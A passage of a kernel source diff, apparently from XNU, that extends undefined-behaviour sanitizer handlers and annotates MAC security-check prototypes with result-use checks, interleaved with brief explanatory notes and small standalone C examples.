@@ -312,26 +573,3 @@ __ubsan_handle_load_invalid_value_abort(struct ubsan_load_invalid_desc *desc, ui
        struct ubsan_violation v = { UBSAN_LOAD_INVALID_VALUE, invalid_value, 0, .invalid = desc, &desc->loc };
        ubsan_handle(&v, Fatal);
 }
-
-#define DEFINE_GENERIC(check) \
-       void __ubsan_handle_##check (struct san_src_loc* loc) \
-       { \
-               struct ubsan_violation v = { UBSAN_GENERIC, 0, 0, .func = __func__, loc }; \
-               ubsan_handle(&v, FleshWound); \
-       } \
-       void __ubsan_handle_##check##_abort(struct san_src_loc* loc) \
-       { \
-               struct ubsan_violation v = { UBSAN_GENERIC, 0, 0, .func = __func__, loc }; \
-               ubsan_handle(&v, Fatal); \
-       }
-
-DEFINE_GENERIC(invalid_builtin)
-DEFINE_GENERIC(nonnull_arg)
-DEFINE_GENERIC(vla_bound_not_positive)
-DEFINE_GENERIC(float_cast_overflow)
-DEFINE_GENERIC(function_type_mismatch)
-DEFINE_GENERIC(missing_return)
-DEFINE_GENERIC(nonnull_return)
-DEFINE_GENERIC(nullability_arg)
-DEFINE_GENERIC(nullability_return)
-DEFINE_GENERIC(implicit_conversion)
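
Each of the new handlers above builds its struct ubsan_violation with a mixed initializer: three positional values for the type and lhs/rhs, a designated member of the anonymous descriptor union, then one more positional value that lands on the field after the union (loc). A standalone illustration of that C initializer behavior, using a mirror struct and made-up values rather than the kernel's types:

/* Mirror-struct illustration of "positional, then designated union member,
 * then positional again", as used by the handlers above. */
#include <stdint.h>
#include <stdio.h>

struct loc { const char *file; };

struct violation {
	uint8_t   kind;
	uint64_t  lhs;
	uint64_t  rhs;
	union {
		const void *desc_a;
		const void *desc_b;
	};
	struct loc *loc;
};

int
main(void)
{
	static struct loc where = { "example.c" };
	const char *desc = "descriptor";

	/* kind=7, lhs=1, rhs=0, union member desc_a=desc, then loc=&where. */
	struct violation v = { 7, 1, 0, .desc_a = desc, &where };

	printf("kind=%u lhs=%llu file=%s\n",
	    (unsigned)v.kind, (unsigned long long)v.lhs, v.loc->file);
	return 0;
}
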
index e24045ab24177342f5f78d2a02aef4556e04d031..36dc50c22ced1fbdd04464eccf966450d2dd5fdb 100644 (file)
@@ -89,6 +89,48 @@ struct ubsan_load_invalid_desc {
        struct san_type_desc *type;
 };
 
+struct ubsan_nullability_arg_desc {
+       struct san_src_loc loc;
+       struct san_src_loc attr_loc;
+       int arg_index;
+};
+
+struct ubsan_nullability_ret_desc {
+       struct san_src_loc loc;
+};
+
+struct ubsan_missing_ret_desc {
+       struct san_src_loc loc;
+};
+
+struct ubsan_float_desc {
+       struct san_src_loc loc;
+       struct san_type_desc *type_from;
+       struct san_type_desc *type_to;
+};
+
+struct ubsan_implicit_conv_desc {
+       struct san_src_loc loc;
+       struct san_type_desc *type_from;
+       struct san_type_desc *type_to;
+       unsigned char kind;
+};
+
+struct ubsan_func_type_mismatch_desc {
+       struct san_src_loc loc;
+       struct san_type_desc *type;
+};
+
+struct ubsan_vla_bound_desc {
+       struct san_src_loc loc;
+       struct san_type_desc *type;
+};
+
+struct ubsan_invalid_builtin {
+       struct san_src_loc loc;
+       unsigned char kind;
+};
+
 enum {
        UBSAN_OVERFLOW_add = 1,
        UBSAN_OVERFLOW_sub,
@@ -100,10 +142,17 @@ enum {
        UBSAN_ALIGN,
        UBSAN_POINTER_OVERFLOW,
        UBSAN_OOB,
-       UBSAN_GENERIC,
        UBSAN_TYPE_MISMATCH,
        UBSAN_LOAD_INVALID_VALUE,
-       UBSAN_VIOLATION_MAX,
+       UBSAN_NULLABILITY_ARG,
+       UBSAN_NULLABILITY_RETURN,
+       UBSAN_MISSING_RETURN,
+       UBSAN_FLOAT_CAST_OVERFLOW,
+       UBSAN_IMPLICIT_CONVERSION,
+       UBSAN_FUNCTION_TYPE_MISMATCH,
+       UBSAN_VLA_BOUND_NOT_POSITIVE,
+       UBSAN_INVALID_BUILTIN,
+       UBSAN_VIOLATION_MAX
 };
 
 struct ubsan_violation {
@@ -118,13 +167,27 @@ struct ubsan_violation {
                struct ubsan_ptroverflow_desc *ptroverflow;
                struct ubsan_oob_desc *oob;
                struct ubsan_load_invalid_desc *invalid;
+               struct ubsan_nullability_arg_desc *nonnull_arg;
+               struct ubsan_nullability_ret_desc *nonnull_ret;
+               struct ubsan_missing_ret_desc *missing_ret;
+               struct ubsan_float_desc *flt;
+               struct ubsan_implicit_conv_desc *implicit;
+               struct ubsan_func_type_mismatch_desc *func_mismatch;
+               struct ubsan_vla_bound_desc *vla_bound;
+               struct ubsan_invalid_builtin *invalid_builtin;
                const char *func;
        };
        struct san_src_loc *loc;
 };
 
+struct ubsan_buf {
+       size_t  ub_logged;
+       size_t  ub_buf_size;
+       char    *ub_buf;
+};
+
 void ubsan_log_append(struct ubsan_violation *);
-size_t ubsan_format(struct ubsan_violation *, char *buf, size_t sz);
+void ubsan_format(struct ubsan_violation *, struct ubsan_buf *);
 
 /*
  * UBSan ABI
@@ -135,10 +198,30 @@ void __ubsan_handle_add_overflow_abort(struct ubsan_overflow_desc *, uint64_t lh
 void __ubsan_handle_builtin_unreachable(struct ubsan_unreachable_desc *);
 void __ubsan_handle_divrem_overflow(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs);
 void __ubsan_handle_divrem_overflow_abort(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs);
+void __ubsan_handle_float_cast_overflow(struct ubsan_float_desc *, uint64_t);
+void __ubsan_handle_float_cast_overflow_abort(struct ubsan_float_desc *, uint64_t);
+void __ubsan_handle_function_type_mismatch(struct ubsan_func_type_mismatch_desc*, uint64_t);
+void __ubsan_handle_function_type_mismatch_abort(struct ubsan_func_type_mismatch_desc *, uint64_t);
+void __ubsan_handle_implicit_conversion(struct ubsan_implicit_conv_desc *, uint64_t, uint64_t);
+void __ubsan_handle_implicit_conversion_abort(struct ubsan_implicit_conv_desc *, uint64_t, uint64_t);
+void __ubsan_handle_invalid_builtin(struct ubsan_invalid_builtin *);
+void __ubsan_handle_invalid_builtin_abort(struct ubsan_invalid_builtin *);
+void __ubsan_handle_load_invalid_value(struct ubsan_load_invalid_desc *, uint64_t);
+void __ubsan_handle_load_invalid_value_abort(struct ubsan_load_invalid_desc *, uint64_t);
+void __ubsan_handle_missing_return(struct ubsan_missing_ret_desc *);
+void __ubsan_handle_missing_return_abort(struct ubsan_missing_ret_desc *);
 void __ubsan_handle_mul_overflow(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs);
 void __ubsan_handle_mul_overflow_abort(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs);
 void __ubsan_handle_negate_overflow(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs);
 void __ubsan_handle_negate_overflow_abort(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs);
+void __ubsan_handle_nonnull_arg(struct ubsan_nullability_arg_desc *);
+void __ubsan_handle_nonnull_arg_abort(struct ubsan_nullability_arg_desc *);
+void __ubsan_handle_nonnull_return_v1(struct ubsan_nullability_ret_desc *, uint64_t);
+void __ubsan_handle_nonnull_return_v1_abort(struct ubsan_nullability_ret_desc *, uint64_t);
+void __ubsan_handle_nullability_arg(struct ubsan_nullability_arg_desc *);
+void __ubsan_handle_nullability_arg_abort(struct ubsan_nullability_arg_desc *);
+void __ubsan_handle_nullability_return_v1(struct ubsan_nullability_ret_desc *, uint64_t);
+void __ubsan_handle_nullability_return_v1_abort(struct ubsan_nullability_ret_desc *, uint64_t);
 void __ubsan_handle_out_of_bounds(struct ubsan_oob_desc *, uint64_t idx);
 void __ubsan_handle_out_of_bounds_abort(struct ubsan_oob_desc *, uint64_t idx);
 void __ubsan_handle_pointer_overflow(struct ubsan_ptroverflow_desc *, uint64_t lhs, uint64_t rhs);
@@ -149,29 +232,7 @@ void __ubsan_handle_sub_overflow(struct ubsan_overflow_desc *, uint64_t lhs, uin
 void __ubsan_handle_sub_overflow_abort(struct ubsan_overflow_desc *, uint64_t lhs, uint64_t rhs);
 void __ubsan_handle_type_mismatch_v1(struct ubsan_align_desc *, uint64_t val);
 void __ubsan_handle_type_mismatch_v1_abort(struct ubsan_align_desc *, uint64_t val);
-void __ubsan_handle_load_invalid_value(struct ubsan_load_invalid_desc *, uint64_t);
-void __ubsan_handle_load_invalid_value_abort(struct ubsan_load_invalid_desc *, uint64_t);
-
-/* currently unimplemented */
-void __ubsan_handle_float_cast_overflow(struct san_src_loc *);
-void __ubsan_handle_float_cast_overflow_abort(struct san_src_loc *);
-void __ubsan_handle_function_type_mismatch(struct san_src_loc *);
-void __ubsan_handle_function_type_mismatch_abort(struct san_src_loc *);
-void __ubsan_handle_implicit_conversion(struct san_src_loc *);
-void __ubsan_handle_implicit_conversion_abort(struct san_src_loc *);
-void __ubsan_handle_invalid_builtin(struct san_src_loc *);
-void __ubsan_handle_invalid_builtin_abort(struct san_src_loc *);
-void __ubsan_handle_missing_return(struct san_src_loc *);
-void __ubsan_handle_missing_return_abort(struct san_src_loc *);
-void __ubsan_handle_nonnull_arg(struct san_src_loc *);
-void __ubsan_handle_nonnull_arg_abort(struct san_src_loc *);
-void __ubsan_handle_nonnull_return(struct san_src_loc *);
-void __ubsan_handle_nonnull_return_abort(struct san_src_loc *);
-void __ubsan_handle_nullability_arg(struct san_src_loc *);
-void __ubsan_handle_nullability_arg_abort(struct san_src_loc *);
-void __ubsan_handle_nullability_return(struct san_src_loc *);
-void __ubsan_handle_nullability_return_abort(struct san_src_loc *);
-void __ubsan_handle_vla_bound_not_positive(struct san_src_loc *);
-void __ubsan_handle_vla_bound_not_positive_abort(struct san_src_loc *);
+void __ubsan_handle_vla_bound_not_positive(struct ubsan_vla_bound_desc *, uint64_t);
+void __ubsan_handle_vla_bound_not_positive_abort(struct ubsan_vla_bound_desc *, uint64_t);
 
 #endif /* _UBSAN_H_ */
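
The _v1 return-nullability handlers declared above take the attribute's declaration location as a second uint64_t argument instead of embedding it in the descriptor, which is why the ubsan.c handlers stash it in v.rhs and format_nonnull_return() casts it back to a struct san_src_loc pointer. A self-contained sketch of that ABI shape; the mirror types and the file/line values are illustrative, not the kernel's definitions.

/* Sketch of the _v1 ABI: the nonnull declaration's location travels as a
 * second pointer-sized argument rather than inside the descriptor. */
#include <stdint.h>
#include <stdio.h>

struct loc  { const char *file; uint32_t line, col; };
struct desc { struct loc loc; };             /* location of the offending return */

static void
handle_nonnull_return_v1(struct desc *d, uint64_t declaration)
{
	struct loc *attr = (struct loc *)(uintptr_t)declaration;

	printf("null return at %s:%u, attribute declared at %s:%u\n",
	    d->loc.file, d->loc.line, attr->file, attr->line);
}

int
main(void)
{
	static struct loc  attr_loc = { "example.c", 12, 7 };    /* the returns_nonnull declaration */
	static struct desc ret_desc = { { "example.c", 40, 9 } };

	handle_nonnull_return_v1(&ret_desc, (uint64_t)(uintptr_t)&attr_loc);
	return 0;
}
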
index 0c77d4ce9be72f4e693fc03196f16d429a8482f8..aedd9f94e81afbc305ed51fffe990afe2c6e710a 100644 (file)
@@ -111,24 +111,26 @@ sysctl_ubsan_log_dump SYSCTL_HANDLER_ARGS
        os_atomic_thread_fence(seq_cst);
        tail = os_atomic_load(&ubsan_log_tail, relaxed);
 
-       char *buf;
-       size_t n = 0;
-       int err;
-
        if (tail == head) {
                return 0; /* log is empty */
        }
 
-       buf = kheap_alloc(KHEAP_TEMP, sz, Z_WAITOK | Z_ZERO);
+       char *buf = kheap_alloc(KHEAP_TEMP, sz, Z_WAITOK | Z_ZERO);
        if (!buf) {
                return 0;
        }
 
+       struct ubsan_buf ubsan_buf = {
+               .ub_logged = 0,
+               .ub_buf_size = sz,
+               .ub_buf = buf
+       };
+
        for (size_t i = tail; i != head; i = next_entry(i)) {
-               n += ubsan_format(&ubsan_log[i], buf + n, sz - n);
+               ubsan_format(&ubsan_log[i], &ubsan_buf);
        }
 
-       err = SYSCTL_OUT(req, buf, n);
+       int err = SYSCTL_OUT(req, buf, ubsan_buf.ub_logged);
 
        kheap_free(KHEAP_TEMP, buf, sz);
        return err;
index dd3da27a10e028ad653695861105108dfdd1cc72..7ac90d1647903b708f02d407e62f5d72cb24b9c9 100644 (file)
 #if CONFIG_MACF
 SYSCTL_NODE(, OID_AUTO, security, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "Security Controls");
-SYSCTL_NODE(_security, OID_AUTO, mac, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
+SYSCTL_EXTENSIBLE_NODE(_security, OID_AUTO, mac, CTLFLAG_RW | CTLFLAG_LOCKED, 0,
     "TrustedBSD MAC policy controls");
 
 /*
@@ -240,7 +240,8 @@ SYSCTL_UINT(_security_mac, OID_AUTO, vnode_enforce, SECURITY_MAC_CTLFLAGS,
  * For a few special operations involving a change to the list of
  * active policies, the mtx itself must be held.
  */
-static lck_mtx_t *mac_policy_mtx;
+static LCK_GRP_DECLARE(mac_lck_grp, "MAC lock");
+static LCK_MTX_DECLARE(mac_policy_mtx, &mac_lck_grp);
 
 /*
  * Policy list array allocation chunk size. Each entry holds a pointer.
@@ -269,11 +270,11 @@ struct mac_label_element_list_t mac_static_label_element_list;
 static __inline void
 mac_policy_grab_exclusive(void)
 {
-       lck_mtx_lock(mac_policy_mtx);
+       lck_mtx_lock(&mac_policy_mtx);
        while (mac_policy_busy != 0) {
-               lck_mtx_sleep(mac_policy_mtx, LCK_SLEEP_UNLOCK,
+               lck_mtx_sleep(&mac_policy_mtx, LCK_SLEEP_UNLOCK,
                    (event_t)&mac_policy_busy, THREAD_UNINT);
-               lck_mtx_lock(mac_policy_mtx);
+               lck_mtx_lock(&mac_policy_mtx);
        }
 }
 
@@ -282,16 +283,16 @@ mac_policy_release_exclusive(void)
 {
        KASSERT(mac_policy_busy == 0,
            ("mac_policy_release_exclusive(): not exclusive"));
-       lck_mtx_unlock(mac_policy_mtx);
+       lck_mtx_unlock(&mac_policy_mtx);
        thread_wakeup((event_t) &mac_policy_busy);
 }
 
 void
 mac_policy_list_busy(void)
 {
-       lck_mtx_lock(mac_policy_mtx);
+       lck_mtx_lock(&mac_policy_mtx);
        mac_policy_busy++;
-       lck_mtx_unlock(mac_policy_mtx);
+       lck_mtx_unlock(&mac_policy_mtx);
 }
 
 int
@@ -303,27 +304,27 @@ mac_policy_list_conditional_busy(void)
                return 0;
        }
 
-       lck_mtx_lock(mac_policy_mtx);
+       lck_mtx_lock(&mac_policy_mtx);
        if (mac_policy_list.numloaded > mac_policy_list.staticmax) {
                mac_policy_busy++;
                ret = 1;
        } else {
                ret = 0;
        }
-       lck_mtx_unlock(mac_policy_mtx);
+       lck_mtx_unlock(&mac_policy_mtx);
        return ret;
 }
 
 void
 mac_policy_list_unbusy(void)
 {
-       lck_mtx_lock(mac_policy_mtx);
+       lck_mtx_lock(&mac_policy_mtx);
        mac_policy_busy--;
        KASSERT(mac_policy_busy >= 0, ("MAC_POLICY_LIST_LOCK"));
        if (mac_policy_busy == 0) {
                thread_wakeup(&mac_policy_busy);
        }
-       lck_mtx_unlock(mac_policy_mtx);
+       lck_mtx_unlock(&mac_policy_mtx);
 }
 
 /*
@@ -332,10 +333,6 @@ mac_policy_list_unbusy(void)
 void
 mac_policy_init(void)
 {
-       lck_grp_attr_t *mac_lck_grp_attr;
-       lck_attr_t *mac_lck_attr;
-       lck_grp_t *mac_lck_grp;
-
        mac_policy_list.numloaded = 0;
        mac_policy_list.max = MAC_POLICY_LIST_CHUNKSIZE;
        mac_policy_list.maxindex = 0;
@@ -353,15 +350,6 @@ mac_policy_init(void)
 
        LIST_INIT(&mac_label_element_list);
        LIST_INIT(&mac_static_label_element_list);
-
-       mac_lck_grp_attr = lck_grp_attr_alloc_init();
-       mac_lck_grp = lck_grp_alloc_init("MAC lock", mac_lck_grp_attr);
-       mac_lck_attr = lck_attr_alloc_init();
-       lck_attr_setdefault(mac_lck_attr);
-       mac_policy_mtx = lck_mtx_alloc_init(mac_lck_grp, mac_lck_attr);
-       lck_attr_free(mac_lck_attr);
-       lck_grp_attr_free(mac_lck_grp_attr);
-       lck_grp_free(mac_lck_grp);
 }
 
 /* Function pointer set up for loading security extensions.
index 5a30437a013ada318fcc3bf6fc853b00ecc4ccb5..ed331a65d98ec57461a6e7cf8ad48b47d6917195 100644 (file)
@@ -121,6 +121,7 @@ struct vnode;
 struct vnode_attr;
 struct vop_setlabel_args;
 
+#include <stdbool.h>
 #include <sys/kauth.h>
 #include <sys/kernel_types.h>
 
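
The hunks that follow annotate the MAC check entry points with __result_use_check, so a caller that drops the returned error now draws a compiler warning, and <stdbool.h> is pulled in for the new bool mac_cred_label_is_equal(). A standalone illustration of the effect, written against the warn_unused_result attribute that xnu's __result_use_check wrapper is built on:

/* Standalone illustration of warn-unused-result checking. */
#include <stdio.h>

__attribute__((warn_unused_result))
static int
check_access(int uid)
{
	return uid == 0 ? 0 : 1;        /* 0 = allowed, nonzero = errno-style denial */
}

int
main(void)
{
	check_access(501);              /* compiler: warning, result ignored */

	int err = check_access(501);    /* correct: result is consumed */
	if (err) {
		fprintf(stderr, "denied (%d)\n", err);
	}
	return 0;
}
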
@@ -142,16 +143,16 @@ typedef struct OSObject *io_object_t;
 
 /*@ === */
 int     mac_audit_check_postselect(kauth_cred_t cred, unsigned short syscode,
-    void *args, int error, int retval, int mac_forced);
+    void *args, int error, int retval, int mac_forced) __result_use_check;
 int     mac_audit_check_preselect(kauth_cred_t cred, unsigned short syscode,
-    void *args);
+    void *args) __result_use_check;
 int     mac_cred_check_label_update(kauth_cred_t cred,
-    struct label *newlabel);
+    struct label *newlabel) __result_use_check;
 int     mac_cred_check_label_update_execve(vfs_context_t ctx,
     struct vnode *vp, off_t offset, struct vnode *scriptvp,
     struct label *scriptvnodelabel, struct label *execlabel,
-    proc_t proc, void *macextensions);
-int     mac_cred_check_visible(kauth_cred_t u1, kauth_cred_t u2);
+    proc_t proc, void *macextensions) __result_use_check;
+int     mac_cred_check_visible(kauth_cred_t u1, kauth_cred_t u2) __result_use_check;
 struct label    *mac_cred_label_alloc(void);
 void    mac_cred_label_associate(kauth_cred_t cred_parent,
     kauth_cred_t cred_child);
@@ -159,10 +160,11 @@ void    mac_cred_label_associate_fork(kauth_cred_t cred, proc_t child);
 void    mac_cred_label_associate_kernel(kauth_cred_t cred);
 void    mac_cred_label_associate_user(kauth_cred_t cred);
 void    mac_cred_label_destroy(kauth_cred_t cred);
-int     mac_cred_label_externalize_audit(proc_t p, struct mac *mac);
+int     mac_cred_label_externalize_audit(proc_t p, struct mac *mac) __result_use_check;
 void    mac_cred_label_free(struct label *label);
 void    mac_cred_label_init(kauth_cred_t cred);
-int     mac_cred_label_compare(struct label *a, struct label *b);
+bool    mac_cred_label_is_equal(const struct label *a, const struct label *b) __result_use_check;
+uint32_t mac_cred_label_hash_update(const struct label *a, uint32_t hash);
 void    mac_cred_label_update(kauth_cred_t cred, struct label *newlabel);
 void    mac_cred_label_update_execve(vfs_context_t ctx, kauth_cred_t newcred,
     struct vnode *vp, off_t offset, struct vnode *scriptvp,
@@ -177,93 +179,94 @@ void    mac_devfs_label_destroy(struct devnode *de);
 void    mac_devfs_label_init(struct devnode *de);
 void    mac_devfs_label_update(struct mount *mp, struct devnode *de,
     struct vnode *vp);
-int     mac_execve_enter(user_addr_t mac_p, struct image_params *imgp);
-int     mac_file_check_change_offset(kauth_cred_t cred, struct fileglob *fg);
-int     mac_file_check_create(kauth_cred_t cred);
-int     mac_file_check_dup(kauth_cred_t cred, struct fileglob *fg, int newfd);
+int     mac_execve_enter(user_addr_t mac_p, struct image_params *imgp) __result_use_check;
+int     mac_file_check_change_offset(kauth_cred_t cred, struct fileglob *fg) __result_use_check;
+int     mac_file_check_create(kauth_cred_t cred) __result_use_check;
+int     mac_file_check_dup(kauth_cred_t cred, struct fileglob *fg, int newfd) __result_use_check;
 int     mac_file_check_fcntl(kauth_cred_t cred, struct fileglob *fg, int cmd,
-    user_long_t arg);
+    user_long_t arg) __result_use_check;
 int     mac_file_check_get(kauth_cred_t cred, struct fileglob *fg,
-    char *elements, size_t len);
-int     mac_file_check_get_offset(kauth_cred_t cred, struct fileglob *fg);
-int     mac_file_check_inherit(kauth_cred_t cred, struct fileglob *fg);
+    char *elements, size_t len) __result_use_check;
+int     mac_file_check_get_offset(kauth_cred_t cred, struct fileglob *fg) __result_use_check;
+int     mac_file_check_inherit(kauth_cred_t cred, struct fileglob *fg) __result_use_check;
 int     mac_file_check_ioctl(kauth_cred_t cred, struct fileglob *fg,
-    unsigned long cmd);
+    unsigned long cmd) __result_use_check;
 int     mac_file_check_lock(kauth_cred_t cred, struct fileglob *fg, int op,
-    struct flock *fl);
+    struct flock *fl) __result_use_check;
 int     mac_file_check_library_validation(struct proc *proc,
     struct fileglob *fg, off_t slice_offset,
-    user_long_t error_message, size_t error_message_size);
+    user_long_t error_message, size_t error_message_size) __result_use_check;
 int     mac_file_check_mmap(kauth_cred_t cred, struct fileglob *fg,
-    int prot, int flags, uint64_t file_pos, int *maxprot);
+    int prot, int flags, uint64_t file_pos, int *maxprot) __result_use_check;
 void    mac_file_check_mmap_downgrade(kauth_cred_t cred, struct fileglob *fg,
     int *prot);
-int     mac_file_check_receive(kauth_cred_t cred, struct fileglob *fg);
+int     mac_file_check_receive(kauth_cred_t cred, struct fileglob *fg) __result_use_check;
 int     mac_file_check_set(kauth_cred_t cred, struct fileglob *fg,
-    char *bufp, size_t buflen);
+    char *bufp, size_t buflen) __result_use_check;
 void    mac_file_notify_close(struct ucred *cred, struct fileglob *fg);
 void    mac_file_label_associate(kauth_cred_t cred, struct fileglob *fg);
 void    mac_file_label_destroy(struct fileglob *fg);
 void    mac_file_label_init(struct fileglob *fg);
-int     mac_iokit_check_open(kauth_cred_t cred, io_object_t user_client, unsigned int user_client_type);
-int     mac_iokit_check_set_properties(kauth_cred_t cred, io_object_t registry_entry, io_object_t properties);
-int     mac_iokit_check_filter_properties(kauth_cred_t cred, io_object_t registry_entry);
-int     mac_iokit_check_get_property(kauth_cred_t cred, io_object_t registry_entry, const char *name);
+int     mac_iokit_check_open_service(kauth_cred_t cred, io_object_t service, unsigned int user_client_type) __result_use_check;
+int     mac_iokit_check_open(kauth_cred_t cred, io_object_t user_client, unsigned int user_client_type) __result_use_check;
+int     mac_iokit_check_set_properties(kauth_cred_t cred, io_object_t registry_entry, io_object_t properties) __result_use_check;
+int     mac_iokit_check_filter_properties(kauth_cred_t cred, io_object_t registry_entry) __result_use_check;
+int     mac_iokit_check_get_property(kauth_cred_t cred, io_object_t registry_entry, const char *name) __result_use_check;
 #ifdef KERNEL_PRIVATE
-int     mac_iokit_check_hid_control(kauth_cred_t cred);
+int     mac_iokit_check_hid_control(kauth_cred_t cred) __result_use_check;
 #endif
 int     mac_mount_check_fsctl(vfs_context_t ctx, struct mount *mp,
-    unsigned long cmd);
+    unsigned long cmd) __result_use_check;
 int     mac_mount_check_getattr(vfs_context_t ctx, struct mount *mp,
-    struct vfs_attr *vfa);
-int     mac_mount_check_label_update(vfs_context_t ctx, struct mount *mp);
+    struct vfs_attr *vfa) __result_use_check;
+int     mac_mount_check_label_update(vfs_context_t ctx, struct mount *mp) __result_use_check;
 int     mac_mount_check_mount(vfs_context_t ctx, struct vnode *vp,
-    struct componentname *cnp, const char *vfc_name);
-int     mac_mount_check_mount_late(vfs_context_t ctx, struct mount *mp);
+    struct componentname *cnp, const char *vfc_name) __result_use_check;
+int     mac_mount_check_mount_late(vfs_context_t ctx, struct mount *mp) __result_use_check;
 int     mac_mount_check_snapshot_create(vfs_context_t ctx, struct mount *mp,
-    const char *name);
+    const char *name) __result_use_check;
 int     mac_mount_check_snapshot_delete(vfs_context_t ctx, struct mount *mp,
-    const char *name);
+    const char *name) __result_use_check;
 #ifdef KERNEL_PRIVATE
 int     mac_mount_check_snapshot_mount(vfs_context_t ctx, struct vnode *rvp,
     struct vnode *vp, struct componentname *cnp, const char *name,
-    const char *vfc_name);
+    const char *vfc_name) __result_use_check;
 #endif
 int     mac_mount_check_snapshot_revert(vfs_context_t ctx, struct mount *mp,
-    const char *name);
-int     mac_mount_check_remount(vfs_context_t ctx, struct mount *mp);
+    const char *name) __result_use_check;
+int     mac_mount_check_remount(vfs_context_t ctx, struct mount *mp) __result_use_check;
 int     mac_mount_check_setattr(vfs_context_t ctx, struct mount *mp,
-    struct vfs_attr *vfa);
-int     mac_mount_check_stat(vfs_context_t ctx, struct mount *mp);
-int     mac_mount_check_umount(vfs_context_t ctx, struct mount *mp);
+    struct vfs_attr *vfa) __result_use_check;
+int     mac_mount_check_stat(vfs_context_t ctx, struct mount *mp) __result_use_check;
+int     mac_mount_check_umount(vfs_context_t ctx, struct mount *mp) __result_use_check;
 void    mac_mount_label_associate(vfs_context_t ctx, struct mount *mp);
 void    mac_mount_label_destroy(struct mount *mp);
 int     mac_mount_label_externalize(struct label *label, char *elements,
-    char *outbuf, size_t outbuflen);
-int     mac_mount_label_get(struct mount *mp, user_addr_t mac_p);
+    char *outbuf, size_t outbuflen) __result_use_check;
+int     mac_mount_label_get(struct mount *mp, user_addr_t mac_p) __result_use_check;
 void    mac_mount_label_init(struct mount *);
-int     mac_mount_label_internalize(struct label *, char *string);
+int     mac_mount_label_internalize(struct label *, char *string) __result_use_check;
 int     mac_pipe_check_ioctl(kauth_cred_t cred, struct pipe *cpipe,
-    unsigned long cmd);
+    unsigned long cmd) __result_use_check;
 int     mac_pipe_check_kqfilter(kauth_cred_t cred, struct knote *kn,
-    struct pipe *cpipe);
-int     mac_pipe_check_read(kauth_cred_t cred, struct pipe *cpipe);
+    struct pipe *cpipe) __result_use_check;
+int     mac_pipe_check_read(kauth_cred_t cred, struct pipe *cpipe) __result_use_check;
 int     mac_pipe_check_select(kauth_cred_t cred, struct pipe *cpipe,
-    int which);
-int     mac_pipe_check_stat(kauth_cred_t cred, struct pipe *cpipe);
-int     mac_pipe_check_write(kauth_cred_t cred, struct pipe *cpipe);
+    int which) __result_use_check;
+int     mac_pipe_check_stat(kauth_cred_t cred, struct pipe *cpipe) __result_use_check;
+int     mac_pipe_check_write(kauth_cred_t cred, struct pipe *cpipe) __result_use_check;
 struct label    *mac_pipe_label_alloc(void);
 void    mac_pipe_label_associate(kauth_cred_t cred, struct pipe *cpipe);
 void    mac_pipe_label_destroy(struct pipe *cpipe);
 void    mac_pipe_label_free(struct label *label);
 void    mac_pipe_label_init(struct pipe *cpipe);
 void    mac_policy_initbsd(void);
-int     mac_posixsem_check_create(kauth_cred_t cred, const char *name);
-int     mac_posixsem_check_open(kauth_cred_t cred, struct pseminfo *psem);
-int     mac_posixsem_check_post(kauth_cred_t cred, struct pseminfo *psem);
+int     mac_posixsem_check_create(kauth_cred_t cred, const char *name) __result_use_check;
+int     mac_posixsem_check_open(kauth_cred_t cred, struct pseminfo *psem) __result_use_check;
+int     mac_posixsem_check_post(kauth_cred_t cred, struct pseminfo *psem) __result_use_check;
 int     mac_posixsem_check_unlink(kauth_cred_t cred, struct pseminfo *psem,
-    const char *name);
-int     mac_posixsem_check_wait(kauth_cred_t cred, struct pseminfo *psem);
+    const char *name) __result_use_check;
+int     mac_posixsem_check_wait(kauth_cred_t cred, struct pseminfo *psem) __result_use_check;
 void    mac_posixsem_vnode_label_associate(kauth_cred_t cred,
     struct pseminfo *psem, struct label *plabel,
     vnode_t vp, struct label *vlabel);
@@ -271,16 +274,16 @@ void    mac_posixsem_label_associate(kauth_cred_t cred,
     struct pseminfo *psem, const char *name);
 void    mac_posixsem_label_destroy(struct pseminfo *psem);
 void    mac_posixsem_label_init(struct pseminfo *psem);
-int     mac_posixshm_check_create(kauth_cred_t cred, const char *name);
+int     mac_posixshm_check_create(kauth_cred_t cred, const char *name) __result_use_check;
 int     mac_posixshm_check_mmap(kauth_cred_t cred, struct pshminfo *pshm,
-    int prot, int flags);
+    int prot, int flags) __result_use_check;
 int     mac_posixshm_check_open(kauth_cred_t cred, struct pshminfo *pshm,
-    int fflags);
-int     mac_posixshm_check_stat(kauth_cred_t cred, struct pshminfo *pshm);
+    int fflags) __result_use_check;
+int     mac_posixshm_check_stat(kauth_cred_t cred, struct pshminfo *pshm) __result_use_check;
 int     mac_posixshm_check_truncate(kauth_cred_t cred, struct pshminfo *pshm,
-    off_t s);
+    off_t s) __result_use_check;
 int     mac_posixshm_check_unlink(kauth_cred_t cred, struct pshminfo *pshm,
-    const char *name);
+    const char *name) __result_use_check;
 void    mac_posixshm_vnode_label_associate(kauth_cred_t cred,
     struct pshminfo *pshm, struct label *plabel,
     vnode_t vp, struct label *vlabel);
@@ -288,233 +291,234 @@ void    mac_posixshm_label_associate(kauth_cred_t cred,
     struct pshminfo *pshm, const char *name);
 void    mac_posixshm_label_destroy(struct pshminfo *pshm);
 void    mac_posixshm_label_init(struct pshminfo *pshm);
-int     mac_priv_check(kauth_cred_t cred, int priv);
-int     mac_priv_grant(kauth_cred_t cred, int priv);
-int     mac_proc_check_debug(proc_ident_t tracing_ident, kauth_cred_t tracing_cred, proc_ident_t traced_ident);
-int     mac_proc_check_dump_core(proc_t proc);
-int     mac_proc_check_proc_info(proc_t curp, proc_t target, int callnum, int flavor);
-int     mac_proc_check_get_cs_info(proc_t curp, proc_t target, unsigned int op);
-int     mac_proc_check_set_cs_info(proc_t curp, proc_t target, unsigned int op);
-int     mac_proc_check_fork(proc_t proc);
-int     mac_proc_check_suspend_resume(proc_t proc, int sr);
-int     mac_proc_check_get_task_name(kauth_cred_t cred, proc_ident_t pident);
-int     mac_proc_check_get_task(kauth_cred_t cred, proc_ident_t pident);
-int     mac_proc_check_expose_task(kauth_cred_t cred, proc_ident_t pident);
